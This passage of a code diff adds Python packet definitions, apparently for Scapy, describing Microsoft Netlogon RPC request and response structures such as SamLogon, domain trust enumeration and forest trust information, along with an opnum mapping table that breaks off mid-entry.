NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRInt3264EnumField("LogonLevel", 0, NETLOGON_LOGON_INFO_CLASS), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_GENERIC_INFO(), + PNETLOGON_GENERIC_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_TICKET_LOGON_INFO(), + PNETLOGON_TICKET_LOGON_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ), + ), + ], + StrFixedLenField("LogonInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRInt3264EnumField("ValidationLevel", 0, NETLOGON_VALIDATION_INFO_CLASS), + NDRIntField("ExtraFlags", 0), + ] + + +class NetrLogonSamLogonEx_Response(NDRPacket): + fields_desc = [ + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO(), + PNETLOGON_VALIDATION_SAM_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO2(), + PNETLOGON_VALIDATION_SAM_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_GENERIC_INFO2(), + PNETLOGON_VALIDATION_GENERIC_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO4(), + PNETLOGON_VALIDATION_SAM_INFO4, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_TICKET_LOGON(), + PNETLOGON_VALIDATION_TICKET_LOGON, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ), + ), + ], + StrFixedLenField("ValidationInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRByteField("Authoritative", 0), + NDRIntField("ExtraFlags", 0), + NDRIntField("status", 0), + ] + + +class DsrEnumerateDomainTrusts_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("Flags", 0), + ] + + +class DsrEnumerateDomainTrusts_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "Domains", PNETLOGON_TRUSTED_DOMAIN_ARRAY(), PNETLOGON_TRUSTED_DOMAIN_ARRAY + ), + NDRIntField("status", 0), + ] + + +class DsrDeregisterDnsHostRecords_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DnsDomainName", "")), + NDRFullPointerField(NDRPacketField("DomainGuid", GUID(), GUID)), + NDRFullPointerField(NDRPacketField("DsaGuid", GUID(), GUID)), + NDRConfVarStrNullFieldUtf16("DnsHostName", ""), + ] + + +class DsrDeregisterDnsHostRecords_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class NetrServerTrustPasswordsGet_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("TrustedDcName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + ] + + +class NetrServerTrustPasswordsGet_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "EncryptedNewOwfPassword", + PENCRYPTED_NT_OWF_PASSWORD(), + PENCRYPTED_NT_OWF_PASSWORD, + ), + NDRPacketField( + "EncryptedOldOwfPassword", + PENCRYPTED_NT_OWF_PASSWORD(), + PENCRYPTED_NT_OWF_PASSWORD, + ), + NDRIntField("status", 0), + ] + + +class LSA_FOREST_TRUST_RECORD_TYPE(IntEnum): + ForestTrustTopLevelName = 0 + ForestTrustTopLevelNameEx = 1 + ForestTrustDomainInfo = 2 + ForestTrustRecordTypeLast = ForestTrustDomainInfo + + +class LARGE_INTEGER(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [NDRSignedLongField("QuadPart", 0)] + + +class LSA_FOREST_TRUST_DOMAIN_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRPacketField("Sid", PRPC_SID(), PRPC_SID)), + NDRPacketField("DnsName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("NetbiosName", UNICODE_STRING(), UNICODE_STRING), + ] + + +class LSA_FOREST_TRUST_BINARY_DATA(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("Length", None, size_of="Buffer"), + NDRFullEmbPointerField( + NDRConfStrLenField("Buffer", "", size_is=lambda pkt: pkt.Length) + ), + ] + + +class PLSA_FOREST_TRUST_RECORD(NDRPacket): + ALIGNMENT = (8, 8) + fields_desc = [ + NDRIntField("Flags", 0), + NDRInt3264EnumField("ForestTrustType", 0, LSA_FOREST_TRUST_RECORD_TYPE), + NDRPacketField("Time", LARGE_INTEGER(), LARGE_INTEGER), + NDRUnionField( + [ + ( + NDRPacketField("ForestTrustData", UNICODE_STRING(), UNICODE_STRING), + ( + ( + lambda pkt: getattr(pkt, "ForestTrustType", None) + in [ + LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustTopLevelName, + LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustTopLevelNameEx, + ] + ), + ( + lambda _, val: val.tag + in [ + LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustTopLevelName, + LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustTopLevelNameEx, + ] + ), + ), + ), + ( + NDRPacketField( + "ForestTrustData", + LSA_FOREST_TRUST_DOMAIN_INFO(), + LSA_FOREST_TRUST_DOMAIN_INFO, + ), + ( + ( + lambda pkt: getattr(pkt, "ForestTrustType", None) + == LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustDomainInfo + ), + ( + lambda _, val: val.tag + == LSA_FOREST_TRUST_RECORD_TYPE.ForestTrustDomainInfo + ), + ), + ), + ], + NDRPacketField( + "ForestTrustData", + LSA_FOREST_TRUST_BINARY_DATA(), + LSA_FOREST_TRUST_BINARY_DATA, + ), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class PLSA_FOREST_TRUST_INFORMATION(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("RecordCount", None, size_of="Entries"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "Entries", + [], + PLSA_FOREST_TRUST_RECORD, + size_is=lambda pkt: pkt.RecordCount, + ptr_pack=True, + ) + ), + ] + + +class DsrGetForestTrustInformation_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("TrustedDomainName", "")), + NDRIntField("Flags", 0), + ] + + +class DsrGetForestTrustInformation_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "ForestTrustInfo", + PLSA_FOREST_TRUST_INFORMATION(), + PLSA_FOREST_TRUST_INFORMATION, + ) + ), + NDRIntField("status", 0), + ] + + +class NetrGetForestTrustInformation_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("Flags", 0), + ] + + +class NetrGetForestTrustInformation_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRFullPointerField( + NDRPacketField( + "ForestTrustInfo", + PLSA_FOREST_TRUST_INFORMATION(), + PLSA_FOREST_TRUST_INFORMATION, + ) + ), + NDRIntField("status", 0), + ] + + +class NetrLogonSamLogonWithFlags_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("LogonServer", "")), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ComputerName", "")), + NDRFullPointerField( + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ) + ), + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRInt3264EnumField("LogonLevel", 0, NETLOGON_LOGON_INFO_CLASS), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_INTERACTIVE_INFO(), + PNETLOGON_INTERACTIVE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonInteractiveTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_SERVICE_INFO(), + PNETLOGON_SERVICE_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonServiceTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_NETWORK_INFO(), + PNETLOGON_NETWORK_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_GENERIC_INFO(), + PNETLOGON_GENERIC_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonGenericInformation + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "LogonInformation", + PNETLOGON_TICKET_LOGON_INFO(), + PNETLOGON_TICKET_LOGON_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "LogonLevel", None) + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ( + lambda _, val: val.tag + == NETLOGON_LOGON_INFO_CLASS.NetlogonTicketLogonInformation + ), + ), + ), + ], + StrFixedLenField("LogonInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRInt3264EnumField("ValidationLevel", 0, NETLOGON_VALIDATION_INFO_CLASS), + NDRIntField("ExtraFlags", 0), + ] + + +class NetrLogonSamLogonWithFlags_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField( + NDRPacketField( + "ReturnAuthenticator", + PNETLOGON_AUTHENTICATOR(), + PNETLOGON_AUTHENTICATOR, + ) + ), + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO(), + PNETLOGON_VALIDATION_SAM_INFO, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO2(), + PNETLOGON_VALIDATION_SAM_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_GENERIC_INFO2(), + PNETLOGON_VALIDATION_GENERIC_INFO2, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationGenericInfo2 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_SAM_INFO4(), + PNETLOGON_VALIDATION_SAM_INFO4, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4 + ), + ), + ), + ( + NDRFullPointerField( + NDRPacketField( + "ValidationInformation", + PNETLOGON_VALIDATION_TICKET_LOGON(), + PNETLOGON_VALIDATION_TICKET_LOGON, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "ValidationLevel", None) + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ( + lambda _, val: val.tag + == NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationTicketLogon + ), + ), + ), + ], + StrFixedLenField("ValidationInformation", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRByteField("Authoritative", 0), + NDRIntField("ExtraFlags", 0), + NDRIntField("status", 0), + ] + + +class PNL_GENERIC_RPC_DATA(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("UlongEntryCount", None, size_of="UlongData"), + NDRFullEmbPointerField( + NDRConfFieldListField( + "UlongData", + [], + NDRIntField("", 0), + size_is=lambda pkt: pkt.UlongEntryCount, + ) + ), + NDRIntField("UnicodeStringEntryCount", None, size_of="UnicodeStringData"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "UnicodeStringData", + [], + PUNICODE_STRING, + size_is=lambda pkt: pkt.UnicodeStringEntryCount, + ) + ), + ] + + +class NetrServerGetTrustInfo_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("TrustedDcName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("SecureChannelType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + ] + + +class NetrServerGetTrustInfo_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "EncryptedNewOwfPassword", + PENCRYPTED_NT_OWF_PASSWORD(), + PENCRYPTED_NT_OWF_PASSWORD, + ), + NDRPacketField( + "EncryptedOldOwfPassword", + PENCRYPTED_NT_OWF_PASSWORD(), + PENCRYPTED_NT_OWF_PASSWORD, + ), + NDRFullPointerField( + NDRPacketField("TrustInfo", PNL_GENERIC_RPC_DATA(), PNL_GENERIC_RPC_DATA) + ), + NDRIntField("status", 0), + ] + + +class OpnumUnused47_Request(NDRPacket): + fields_desc = [] + + +class OpnumUnused47_Response(NDRPacket): + fields_desc = [NDRIntField("status", 0)] + + +class PNL_DNS_NAME_INFO(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("Type", 0), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DnsDomainInfo", "")), + NDRIntField("DnsDomainInfoType", 0), + NDRIntField("Priority", 0), + NDRIntField("Weight", 0), + NDRIntField("Port", 0), + NDRByteField("Register", 0), + NDRIntField("Status", 0), + ] + + +class PNL_DNS_NAME_INFO_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("EntryCount", None, size_of="DnsNamesInfo"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "DnsNamesInfo", + [], + PNL_DNS_NAME_INFO, + size_is=lambda pkt: pkt.EntryCount, + ) + ), + ] + + +class DsrUpdateReadOnlyServerDnsRecords_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("SiteName", "")), + NDRIntField("DnsTtl", 0), + NDRPacketField("DnsNames", PNL_DNS_NAME_INFO_ARRAY(), PNL_DNS_NAME_INFO_ARRAY), + ] + + +class DsrUpdateReadOnlyServerDnsRecords_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField("DnsNames", PNL_DNS_NAME_INFO_ARRAY(), PNL_DNS_NAME_INFO_ARRAY), + NDRIntField("status", 0), + ] + + +class NL_OSVERSIONINFO_V1(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("dwOSVersionInfoSize", 0), + NDRIntField("dwMajorVersion", 0), + NDRIntField("dwMinorVersion", 0), + NDRIntField("dwBuildNumber", 0), + NDRIntField("dwPlatformId", 0), + StrFixedLenFieldUtf16("szCSDVersion", "", length=128 * 2), + NDRShortField("wServicePackMajor", 0), + NDRShortField("wServicePackMinor", 0), + NDRShortField("wSuiteMask", 0), + NDRByteField("wProductType", 0), + NDRByteField("wReserved", 0), + ] + + +class NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("ClientDnsHostName", "")), + NDRFullEmbPointerField( + NDRPacketField( + "OsVersionInfo_V1", NL_OSVERSIONINFO_V1(), NL_OSVERSIONINFO_V1 + ) + ), + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("OsName", "")), + ] + + +class NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("HubName", "")), + NDRFullEmbPointerField( + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("OldDnsHostName", "")) + ), + NDRFullEmbPointerField(NDRIntField("SupportedEncTypes", 0)), + ] + + +class NetrChainSetClientAttributes_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("PrimaryName", ""), + NDRConfVarStrNullFieldUtf16("ChainedFromServerName", ""), + NDRConfVarStrNullFieldUtf16("ChainedForClientName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("dwInVersion", 0), + NDRUnionField( + [ + ( + NDRPacketField( + "pmsgIn", + NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1(), + NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1, + ), + ( + (lambda pkt: getattr(pkt, "dwInVersion", None) == 1), + (lambda _, val: val.tag == 1), + ), + ) + ], + StrFixedLenField("pmsgIn", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("pdwOutVersion", 0), + NDRUnionField( + [ + ( + NDRPacketField( + "pmsgOut", + NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1(), + NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1, + ), + ( + (lambda pkt: getattr(pkt, "pdwOutVersion", None) == 1), + (lambda _, val: val.tag == 1), + ), + ) + ], + StrFixedLenField("pmsgOut", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + ] + + +class NetrChainSetClientAttributes_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("pdwOutVersion", 0), + NDRUnionField( + [ + ( + NDRPacketField( + "pmsgOut", + NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1(), + NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1, + ), + ( + (lambda pkt: getattr(pkt, "pdwOutVersion", None) == 1), + (lambda _, val: val.tag == 1), + ), + ) + ], + StrFixedLenField("pmsgOut", "", length=0), + align=(4, 8), + switch_fmt=("L", "L"), + ), + NDRIntField("status", 0), + ] + + +class NetrServerAuthenticateKerberos_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("AccountName", ""), + NDRInt3264EnumField("AccountType", 0, NETLOGON_SECURE_CHANNEL_TYPE), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRIntField("NegotiateFlags", 0), + ] + + +class NetrServerAuthenticateKerberos_Response(NDRPacket): + fields_desc = [ NDRIntField("NegotiateFlags", 0), NDRIntField("AccountRid", 0), NDRIntField("status", 0), @@ -91,8 +4302,94 @@ class NetrServerAuthenticate3_Response(NDRPacket): LOGON_OPNUMS = { + 0: DceRpcOp(NetrLogonUasLogon_Request, NetrLogonUasLogon_Response), + 1: DceRpcOp(NetrLogonUasLogoff_Request, NetrLogonUasLogoff_Response), + 2: DceRpcOp(NetrLogonSamLogon_Request, NetrLogonSamLogon_Response), + 3: DceRpcOp(NetrLogonSamLogoff_Request, NetrLogonSamLogoff_Response), 4: DceRpcOp(NetrServerReqChallenge_Request, NetrServerReqChallenge_Response), + 5: DceRpcOp(NetrServerAuthenticate_Request, NetrServerAuthenticate_Response), + 6: DceRpcOp(NetrServerPasswordSet_Request, NetrServerPasswordSet_Response), + 7: DceRpcOp(NetrDatabaseDeltas_Request, NetrDatabaseDeltas_Response), + 8: DceRpcOp(NetrDatabaseSync_Request, NetrDatabaseSync_Response), + 9: DceRpcOp(NetrAccountDeltas_Request, NetrAccountDeltas_Response), + 10: DceRpcOp(NetrAccountSync_Request, NetrAccountSync_Response), + 11: DceRpcOp(NetrGetDCName_Request, NetrGetDCName_Response), + 12: DceRpcOp(NetrLogonControl_Request, NetrLogonControl_Response), + 13: DceRpcOp(NetrGetAnyDCName_Request, NetrGetAnyDCName_Response), + 14: DceRpcOp(NetrLogonControl2_Request, NetrLogonControl2_Response), + 15: DceRpcOp(NetrServerAuthenticate2_Request, NetrServerAuthenticate2_Response), + 16: DceRpcOp(NetrDatabaseSync2_Request, NetrDatabaseSync2_Response), + 17: DceRpcOp(NetrDatabaseRedo_Request, NetrDatabaseRedo_Response), + 18: DceRpcOp(NetrLogonControl2Ex_Request, NetrLogonControl2Ex_Response), + 19: DceRpcOp( + NetrEnumerateTrustedDomains_Request, NetrEnumerateTrustedDomains_Response + ), + 20: DceRpcOp(DsrGetDcName_Request, DsrGetDcName_Response), + 21: DceRpcOp(NetrLogonGetCapabilities_Request, NetrLogonGetCapabilities_Response), + 22: DceRpcOp(NetrLogonSetServiceBits_Request, NetrLogonSetServiceBits_Response), + 23: DceRpcOp(NetrLogonGetTrustRid_Request, NetrLogonGetTrustRid_Response), + 24: DceRpcOp( + NetrLogonComputeServerDigest_Request, NetrLogonComputeServerDigest_Response + ), + 25: DceRpcOp( + NetrLogonComputeClientDigest_Request, NetrLogonComputeClientDigest_Response + ), 26: DceRpcOp(NetrServerAuthenticate3_Request, NetrServerAuthenticate3_Response), + 27: 